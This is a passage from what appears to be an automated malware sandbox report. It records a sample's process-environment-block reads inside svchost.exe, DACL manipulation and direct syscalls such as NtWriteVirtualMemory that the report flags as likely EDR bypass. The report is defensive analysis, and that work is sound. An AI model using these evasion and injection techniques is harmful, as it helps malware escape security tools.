            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h]1_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA456 mov eax, dword ptr fs:[00000030h]1_2_035EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352645D mov eax, dword ptr fs:[00000030h]1_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355245A mov eax, dword ptr fs:[00000030h]1_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC460 mov ecx, dword ptr fs:[00000030h]1_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C427 mov eax, dword ptr fs:[00000030h]1_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035304E5 mov ecx, dword ptr fs:[00000030h]1_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA49A mov eax, dword ptr fs:[00000030h]1_2_035EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035644B0 mov ecx, dword ptr fs:[00000030h]1_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BA4B0 mov eax, dword ptr fs:[00000030h]1_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035364AB mov eax, dword ptr fs:[00000030h]1_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528B50 mov eax, dword ptr fs:[00000030h]1_2_03528B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEB50 mov eax, dword ptr fs:[00000030h]1_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h]1_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h]1_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h]1_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h]1_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FAB40 mov eax, dword ptr fs:[00000030h]1_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D8B42 mov eax, dword ptr fs:[00000030h]1_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352CB7E mov eax, dword ptr fs:[00000030h]1_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604B00 mov eax, dword ptr fs:[00000030h]1_2_03604B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h]1_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h]1_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h]1_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h]1_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEBD0 mov eax, dword ptr fs:[00000030h]1_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EBFC mov eax, dword ptr fs:[00000030h]1_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BCBF0 mov eax, dword ptr fs:[00000030h]1_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h]1_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h]1_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h]1_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h]1_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h]1_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h]1_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h]1_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h]1_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEA60 mov eax, dword ptr fs:[00000030h]1_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BCA11 mov eax, dword ptr fs:[00000030h]1_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h]1_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h]1_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA24 mov eax, dword ptr fs:[00000030h]1_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EA2E mov eax, dword ptr fs:[00000030h]1_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530AD0 mov eax, dword ptr fs:[00000030h]1_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h]1_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h]1_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h]1_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h]1_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568A90 mov edx, dword ptr fs:[00000030h]1_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604A80 mov eax, dword ptr fs:[00000030h]1_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h]1_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h]1_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586AA4 mov eax, dword ptr fs:[00000030h]1_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B0946 mov eax, dword ptr fs:[00000030h]1_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604940 mov eax, dword ptr fs:[00000030h]1_2_03604940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h]1_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h]1_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC97C mov eax, dword ptr fs:[00000030h]1_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov eax, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov edx, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov eax, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC912 mov eax, dword ptr fs:[00000030h]1_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528918 mov eax, dword ptr fs:[00000030h]1_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528918 mov eax, dword ptr fs:[00000030h]1_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h]1_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h]1_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B892A mov eax, dword ptr fs:[00000030h]1_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C892B mov eax, dword ptr fs:[00000030h]1_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035649D0 mov eax, dword ptr fs:[00000030h]1_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FA9D3 mov eax, dword ptr fs:[00000030h]1_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C69C0 mov eax, dword ptr fs:[00000030h]1_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h]1_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h]1_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE9E0 mov eax, dword ptr fs:[00000030h]1_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B89B3 mov esi, dword ptr fs:[00000030h]1_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B89B3 mov eax, dword ptr fs:[00000030h]1_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B89B3 mov eax, dword ptr fs:[00000030h]1_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035309AD mov eax, dword ptr fs:[00000030h]1_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035309AD mov eax, dword ptr fs:[00000030h]1_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03560854 mov eax, dword ptr fs:[00000030h]1_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534859 mov eax, dword ptr fs:[00000030h]1_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534859 mov eax, dword ptr fs:[00000030h]1_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03542840 mov ecx, dword ptr fs:[00000030h]1_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE872 mov eax, dword ptr fs:[00000030h]1_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE872 mov eax, dword ptr fs:[00000030h]1_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6870 mov eax, dword ptr fs:[00000030h]1_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6870 mov eax, dword ptr fs:[00000030h]1_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC810 mov eax, dword ptr fs:[00000030h]1_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov ecx, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006D81F7
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006AA364 SetUnhandledExceptionFilter,0_2_006AA364
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006AA395

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
